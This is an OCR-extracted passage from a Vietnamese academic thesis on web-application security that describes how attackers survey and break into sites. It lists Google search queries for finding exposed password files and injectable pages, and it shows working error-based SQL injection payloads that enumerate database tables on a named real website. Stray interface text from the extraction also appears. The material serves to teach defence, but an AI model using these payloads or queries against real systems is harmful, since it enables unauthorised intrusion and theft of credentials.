KHẢO SÁT ỨNG DỤNG WEB

Một phần của tài liệu NGHIÊN cứu bảo đảm AN TOÀN THÔNG TIN BẰNG KIẾM SOÁT “lỗ HỔNG” TRONG DỊCH vụ WEB (Trang 64 - 68)

TỔNG KẾT Q TRÌNH TẤN CƠNG CỦA HACKER

3.2. KHẢO SÁT ỨNG DỤNG WEB

Phương pháp khảo sát khá phổ biến, đó là Xem mã nguồn và lợi dụng các lỗi

cho phép xem mã nguồn. để tìm phương thức tấn cơng phù hợp.

Một số ngơn ngữ web thơng dụng hiện nay có nhiều lỗi này như Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server

(CFM), Hypertext Preprocessor (PHP).

Tìm các site bị lỗi này bằng cách dùng www.google.com, search từ khóa liên quan.

Sử dụng allinurl: trước đoạn string đặc biệt cần kiếm, thì những trang Web tìm kiếm được chắc chắn sẽ có chuỗi cần tìm.

Ví dụ:

"allinurl:/advadmin" (khơng có ngoặc kép) thì chỉ liệt kê ra những trang có URL có dạng : http://tentrangweb.com/advadmin.

Tìm các file trên http://www.google.com thì thêm chữ type file: trước tên file cần tìm trên các chun khu web.

Ví dụ:

+ Muốn tìm file mdb (đây là file chứa mật khẩu của các trang Web, dùng Access để mở) thì vào http://www.google.com và đánh type file:mdb

+ Tìm file SAM (đây là file chứa Password của Windows NT, dùng L0phtCrack để Crack) thì vào http://www.google.com và đánh type file:SAM + Tấn cơng vượt qua các cơ chế kiểm sốt (authentication, authorization)

Bao gồm các phương pháp như đốn mật khẩu, thay đoi thơng tin cookies, các kĩ thuật directory traversal, leo thang đặc quyền, các phương pháp tấn công dựa vào SQL, SQL injection...

+ Tìm hiểu sâu về các chức năng của ứng dụng web

Tìm hiểu cách thực hiện của các phần trong ứng dụng, đặc biệt như các order input, coníirmation, order tracking. Ớ đây ta có thể áp dụng các phương pháp như SQL Injection, input validation...

+ Tìm hiểu luồng di chuyển của thơng tin

Các thông tin tương tác giữa client và server, các thông tin tương tác với database. Hiện nay việc viết mã để thực hiện việc giao tiếp thông tin thường phải đảm bảo được tính hiệu quả (nhanh), và bảo mật (có thể sẽ chậm hơn). Thường thì tính hiệu quả được ưu tiên hơn do đó có thể sẽ phát sinh lỗi trong q trình đó và giúp hacker có thể lợi dụng các lỗi như SQL input...để đoạt quyền điều khiển hệ thống.

+ Tấn công

Khi đã thu thập và khảo sát kỹ càng đối tượng, hacker bắt đầu thực hiện tấn công nhằm xâm nhập vào hệ thống lấy thông tin, đưa thông tin xấu vào, dành quyền kiểm sốt,... Cịn nếu khơng thành cơng trong việc xâm nhập, thì Dos là cách thức cuối cùng mà hacker thường lựa chọn để làm cho hệ thống khơng thể hoạt đơng được.

Ví dụ kiểu tấn cơng SQL Injection bằng câu lệnh SELECT

nhằm lấy tên đăng nhập và mật khẩu của admin (bằng cách thêm câu lệnh truy vấn trên URL):

(Thử nghiệm tấn công vào trang http://www.ectb.org )

- Tìm những trang web có khả năng bị lỗI SQL Injection: sử dụng từ khóa

“allinurl”:

allinurl :"shopdisplayproducts.asp?code=

(Có thể là “id=” hoặc “cat=”)

“code=”:

http://www.ectb.org/ectb/tabs/leagues/league_listing.asp?code=DL'

Bây giờ ta sẽ khai thác lỗi bằng cách thêm câu lệnh SQL vào sau dấu nháy: - Mục tiêu thứ nhất là lấy bảng đầu tiên trong CSDL:

%20and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password

information_schema.tables: chứa tất cả các bảng DL.

- Lấy lần lượt các bảng con lại trong CSDL: sử dụng câu lệnh “not in” vớI bảng đầu tiên.

%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('LeagueMaster2')))--sp_password

'Sr ECTB - Elite championship Tourn.., + Ãdd Tab E

ùpnnsurs

Assucĩates

At íìlidt j 0 ns

Một phần của tài liệu NGHIÊN cứu bảo đảm AN TOÀN THÔNG TIN BẰNG KIẾM SOÁT “lỗ HỔNG” TRONG DỊCH vụ WEB (Trang 64 - 68)

Tải bản đầy đủ (DOCX)

(74 trang)
w